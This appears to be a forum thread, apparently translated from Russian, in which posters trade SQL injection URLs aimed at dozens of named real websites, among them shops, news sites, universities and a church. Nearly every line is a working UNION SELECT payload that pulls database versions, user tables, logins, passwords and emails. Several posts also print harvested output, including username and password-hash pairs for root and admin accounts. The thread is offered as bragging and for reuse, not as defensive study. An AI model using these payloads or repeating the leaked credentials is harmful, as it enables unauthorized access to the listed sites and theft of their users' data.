Output in the title: Code: http://www.rosmed.ru/news.php?act=by_id&news_id=-1+union+select+convert(concat(comp_domain,char(58),comp_user_fio,char(58),comp_user_mail,char(58),comp_user_pass,char(58),comp_addr_phone),char),2+from+comp/*
www.tal-shop.se Code: http://www.tal-shop.se/index.php?id=5&cid=-38+union+select+concat(passwd,0x3a,id_user,0x3a)+from+users/* Code: http://www.spinter.net/page.php?id=-22+union+select+version(),user()/* Code: http://www.gmstz.edu.ba/vijesti.php?id=-64+union+select+1,database(),3,4,5/*
Didn't even need char(), as if they knew =)) Code: http://www.gostudy.com.ua/news.phtml?id=-40+union+select+1,2,user(),database(),version(),6,7,8,9+from+users/* This is a reply to the recent "great" hack of Udav... 3 steps) Code: http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11,12,13,14+from+INFORMATION_SCHEMA.TABLES/* http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,6,COLUMN_NAME,8,9,10,11,12,13,14+from+INFORMATION_SCHEMA.COLUMNS/* http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,id,concat_ws(char(58),FIO,Login,PasWD),8,9,10,11,12,13,14+from+accounts/*
couldn't find the password column - Code: http://www.expat.ru/restaurantreviews.php?cid=-1+union+select+1,2,3,4,5,username,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+user+limit+2000,2001 Code: http://www.sportshopik.ru/shop.php?CID=-1+union+select+1,concat(user(),char(64),version(),char(64),database())
Code: http://www.polirem.ua/polyukr/news.phtml?id=-16+union+select+concat_ws(char(58),user(),database(),version())/* a cute one =\ Code: http://www.skitours.com.ua/news.phtml?id=-13763+union+select+1,concat(version(),char(58),user()),password,id,database(),6,7,8,9,10,11+from+users/* Code: http://www.kharkov-sport.com/news.phtml?id=-1326+union+select+1,2,database(),version(),5,6,7,8,9,10,user()/*&print=yes
www.rootkitshield.com Code: http://www.rootkitshield.com/links/dead.php?id=-8+union+select+1,2,3,4,version(),6,7,8,9/*
to InferNo23 Code: http://www.expat.ru/restaurantreviews.php?cid=-1+union+select+1,2,concat(password,0x3a,username),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+user/* 8fb8b4736f9f74bb1d301491e1798b08:Martin
Code: http://www.massagan.com/news.php?mod=news&catid=1&id=-540+union+select+1,concat(user(),0x3a,version(),0x3a,database()),password,4,5,6,name,8+from+users/*
www.proformula.ua Code: http://www.proformula.ua/news.phtml?id=-9174+union+select+1,version(),3,4,5,6,7,8,9,10,11/* www.gostudy.com.ua Code: http://www.gostudy.com.ua/news.phtml?id=-40+union+select+1,user(),3,4,5,6,7,8,9/*
Code: http://www.archdiocese.la/podcasts/detail.php?id=-30%20UNION%20SELECT%201,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*
http://www.dozka.ru/start.php?main=gallery&act=image&image=-1+union+select+1,2,3,password,5,6,7,8+from+forum+limit+0,10/* http://www.orel-news.ru/index.php?main=showorelnews&id=-1+union+select+1,2,3,4,version(),6,7,8,9/* http://www.psyedu.ru/rub.php?tema=-1+union+select+1,concat(id,0x7c2d2d7c,password,0x7c2d2d7c,email),3+from+users/* http://bestposters.ru/main.php?big=-1+union+select+1,2,email,4,5,login,7,password,9,10,11,12,13,14,15+from+users+limit+3,1/* (Straight to the e-mail and ICQ) http://www.farma-96.ru/index.php?main=catalogue&object=round&round_ID=-1+union+select+1,2,3,4,name,6,7,pass,9,10+from+users+limit+2,1/* http://www.openmic.ru/song_info.php?songid=-1+union+select+1,2,3,4,user(),6,7,8/* http://www.bis077.ru/main.php?action=catalog_body&item=catalog_firm&id=-1+union+select+1,2,3333333,4,5+from+users/*
Code: http://www.mcmenamins.com/index.php?loc=3+and+1=999+union+select+1,2,3,4,5,6,concat(user,0x3a,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user+limit+0,1/* root:07323b9e7d2a8d4f Code: http://www.unirc.it/comunicazione/all_news.php?task=view&id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x00),0x00),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+mysql.user+limit+3,1/* admin:0e67f9402e61771f == rowing root:46d9bd420a1edee2
www.da.wvu.edu Code: http://www.da.wvu.edu/XMLParser/printstory.phtml?id=-22813+union+select+1,2,user(),4,5,6,7,8,9,10,11/*
Code: http://bl4u.ru/stat.php?id=-1+union+select+1,2,version(),4,5,6/* ___ Code: http://present-link.info/stat.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21/* Code: http://www.top100.vrn.ru/stat.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21/* P.S. All the scripts of this catalog have an SQL injection...
http://webwarper.net/ru/www.nskfei.ru/girl.php?ids=-52+union+select+1,2,3,4,5,6,7,8/* http://www.spb-mebel.ru/show_firm.php?id_firm=-171+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/* http://www.pobeda.info/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,concat(pn_uname,0x3a,pn_pass,0x3a,pn_email),6,7,8,9,10,11,12,13,14,15,16,17+from+nuke_users+limit+1,1/* http://hike.ru/index.php?module=subjects&func=viewpage&pageid=1+union+select+1,2,3,4,concat(pn_uname,0x3a,pn_pass,0x3a,pn_email),6,7,8,9,10,11,12,13,14,15,16,17+from+nuke_users+limit+2,1/* http://www.jordandistrict.org/policymanual/p.php?id=-26+union+select+1,2,3,4,5/* http://it.byuh.edu/P%20&%20S/p.php?id=-21+union+select+1,2,3/* http://www.swiss-music-export.com/p.php?ID=-148+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* http://date.bignepal.com/p.php?id=-1290+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*